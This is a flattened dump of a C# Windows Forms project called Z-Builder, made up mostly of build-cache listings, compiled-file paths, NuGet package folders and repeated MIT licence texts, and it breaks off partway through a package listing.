https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Debug/Z_Builder.Properties.Resources.resources -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Release/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Release/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Release/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Release/TempPE/Properties.Resources.Designer.cs.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Release/TempPE/Properties.Resources.Designer.cs.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Release/Z-Builder.csproj.CopyComplete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Release/Z-Builder.csproj.CopyComplete -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Release/Z-Builder.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 1b4895b34cb910904fbd9edc3e9a9fd57be3bbb3 2 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Release/Z-Builder.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\obj\Release\Z-Builder.csprojAssemblyReference.cache 2 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\obj\Release\Z_Builder.Form1.resources 3 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\obj\Release\Z_Builder.Form2.resources 4 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\obj\Release\Z_Builder.Properties.Resources.resources 5 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\obj\Release\Z-Builder.csproj.GenerateResource.cache 6 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\obj\Release\Z-Builder.csproj.CoreCompileInputs.cache 7 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\bin\Release\Z-Builder.exe 8 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\bin\Release\Z-Builder.pdb 9 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\bin\Release\AnonFileAPI.dll 10 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\bin\Release\MetroFramework.Design.dll 11 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\bin\Release\MetroFramework.dll 12 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\bin\Release\MetroFramework.Fonts.dll 13 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\bin\Release\System.Configuration.ConfigurationManager.dll 14 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\bin\Release\System.Security.AccessControl.dll 15 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\bin\Release\System.Security.Permissions.dll 16 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\bin\Release\System.Security.Principal.Windows.dll 17 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\bin\Release\System.Configuration.ConfigurationManager.xml 18 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\bin\Release\System.Security.AccessControl.xml 19 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\bin\Release\System.Security.Permissions.xml 20 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\bin\Release\System.Security.Principal.Windows.xml 21 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\obj\Release\Z-Builder.csproj.CopyComplete 22 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\obj\Release\Z-Builder.exe 23 | C:\Users\zephy\source\repos\Z-Builder\Z-Builder\Z-Builder\obj\Release\Z-Builder.pdb 24 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Release/Z-Builder.csproj.GenerateResource.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Release/Z-Builder.csproj.GenerateResource.cache -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Release/Z-Builder.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Release/Z-Builder.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Release/Z-Builder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Release/Z-Builder.exe -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Release/Z-Builder.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Release/Z-Builder.pdb -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Release/Z_Builder.Form1.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Release/Z_Builder.Form1.resources -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Release/Z_Builder.Form2.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Release/Z_Builder.Form2.resources -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Release/Z_Builder.Properties.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Release/Z_Builder.Properties.Resources.resources -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/packages.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Z-Builder/packages/MetroModernUI.1.4.0.0/.signature.p7s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/MetroModernUI.1.4.0.0/.signature.p7s -------------------------------------------------------------------------------- /Z-Builder/packages/MetroModernUI.1.4.0.0/MetroModernUI.1.4.0.0.nupkg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/MetroModernUI.1.4.0.0/MetroModernUI.1.4.0.0.nupkg -------------------------------------------------------------------------------- /Z-Builder/packages/MetroModernUI.1.4.0.0/lib/net/MetroFramework.Design.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/MetroModernUI.1.4.0.0/lib/net/MetroFramework.Design.dll -------------------------------------------------------------------------------- /Z-Builder/packages/MetroModernUI.1.4.0.0/lib/net/MetroFramework.Fonts.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/MetroModernUI.1.4.0.0/lib/net/MetroFramework.Fonts.dll -------------------------------------------------------------------------------- /Z-Builder/packages/MetroModernUI.1.4.0.0/lib/net/MetroFramework.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/MetroModernUI.1.4.0.0/lib/net/MetroFramework.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/.signature.p7s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/.signature.p7s -------------------------------------------------------------------------------- /Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/LICENSE.TXT: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) .NET Foundation and Contributors 4 | 5 | All rights reserved. 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | -------------------------------------------------------------------------------- /Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/System.Configuration.ConfigurationManager.4.7.0.nupkg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/System.Configuration.ConfigurationManager.4.7.0.nupkg -------------------------------------------------------------------------------- /Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/lib/net461/System.Configuration.ConfigurationManager.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/lib/net461/System.Configuration.ConfigurationManager.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/lib/netstandard2.0/System.Configuration.ConfigurationManager.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/lib/netstandard2.0/System.Configuration.ConfigurationManager.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/ref/net461/System.Configuration.ConfigurationManager.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/ref/net461/System.Configuration.ConfigurationManager.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/ref/netstandard2.0/System.Configuration.ConfigurationManager.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/ref/netstandard2.0/System.Configuration.ConfigurationManager.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/useSharedDesignerContext.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/useSharedDesignerContext.txt -------------------------------------------------------------------------------- /Z-Builder/packages/System.Configuration.ConfigurationManager.4.7.0/version.txt: -------------------------------------------------------------------------------- 1 | 0f7f38c4fd323b26da10cce95f857f77f0f09b48 2 | -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/.signature.p7s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/.signature.p7s -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/LICENSE.TXT: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) .NET Foundation and Contributors 4 | 5 | All rights reserved. 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/System.Security.AccessControl.4.7.0.nupkg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/System.Security.AccessControl.4.7.0.nupkg -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/lib/net46/System.Security.AccessControl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/lib/net46/System.Security.AccessControl.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/lib/net461/System.Security.AccessControl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/lib/net461/System.Security.AccessControl.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/lib/netstandard1.3/System.Security.AccessControl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/lib/netstandard1.3/System.Security.AccessControl.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/lib/netstandard2.0/System.Security.AccessControl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/lib/netstandard2.0/System.Security.AccessControl.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/lib/uap10.0.16299/_._: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/lib/uap10.0.16299/_._ -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/ref/net46/System.Security.AccessControl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/ref/net46/System.Security.AccessControl.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/ref/net461/System.Security.AccessControl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/ref/net461/System.Security.AccessControl.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/ref/netstandard1.3/System.Security.AccessControl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/ref/netstandard1.3/System.Security.AccessControl.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/ref/netstandard2.0/System.Security.AccessControl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/ref/netstandard2.0/System.Security.AccessControl.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/ref/uap10.0.16299/_._: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/ref/uap10.0.16299/_._ -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/runtimes/win/lib/net46/System.Security.AccessControl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/runtimes/win/lib/net46/System.Security.AccessControl.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/runtimes/win/lib/net461/System.Security.AccessControl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/runtimes/win/lib/net461/System.Security.AccessControl.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/runtimes/win/lib/netcoreapp2.0/System.Security.AccessControl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/runtimes/win/lib/netcoreapp2.0/System.Security.AccessControl.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/runtimes/win/lib/netstandard1.3/System.Security.AccessControl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/runtimes/win/lib/netstandard1.3/System.Security.AccessControl.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/runtimes/win/lib/uap10.0.16299/_._: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/runtimes/win/lib/uap10.0.16299/_._ -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/useSharedDesignerContext.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.AccessControl.4.7.0/useSharedDesignerContext.txt -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.AccessControl.4.7.0/version.txt: -------------------------------------------------------------------------------- 1 | 0f7f38c4fd323b26da10cce95f857f77f0f09b48 2 | -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Permissions.4.7.0/.signature.p7s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Permissions.4.7.0/.signature.p7s -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Permissions.4.7.0/LICENSE.TXT: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) .NET Foundation and Contributors 4 | 5 | All rights reserved. 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Permissions.4.7.0/System.Security.Permissions.4.7.0.nupkg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Permissions.4.7.0/System.Security.Permissions.4.7.0.nupkg -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Permissions.4.7.0/lib/net461/System.Security.Permissions.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Permissions.4.7.0/lib/net461/System.Security.Permissions.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Permissions.4.7.0/lib/netcoreapp3.0/System.Security.Permissions.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Permissions.4.7.0/lib/netcoreapp3.0/System.Security.Permissions.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Permissions.4.7.0/lib/netstandard2.0/System.Security.Permissions.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Permissions.4.7.0/lib/netstandard2.0/System.Security.Permissions.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Permissions.4.7.0/ref/net461/System.Security.Permissions.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Permissions.4.7.0/ref/net461/System.Security.Permissions.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Permissions.4.7.0/ref/netcoreapp3.0/System.Security.Permissions.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Permissions.4.7.0/ref/netcoreapp3.0/System.Security.Permissions.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Permissions.4.7.0/ref/netstandard2.0/System.Security.Permissions.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Permissions.4.7.0/ref/netstandard2.0/System.Security.Permissions.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Permissions.4.7.0/useSharedDesignerContext.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Permissions.4.7.0/useSharedDesignerContext.txt -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Permissions.4.7.0/version.txt: -------------------------------------------------------------------------------- 1 | 0f7f38c4fd323b26da10cce95f857f77f0f09b48 2 | -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/.signature.p7s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/.signature.p7s -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/LICENSE.TXT: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) .NET Foundation and Contributors 4 | 5 | All rights reserved. 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/System.Security.Principal.Windows.4.7.0.nupkg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/System.Security.Principal.Windows.4.7.0.nupkg -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/lib/net46/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/lib/net46/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/lib/net461/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- 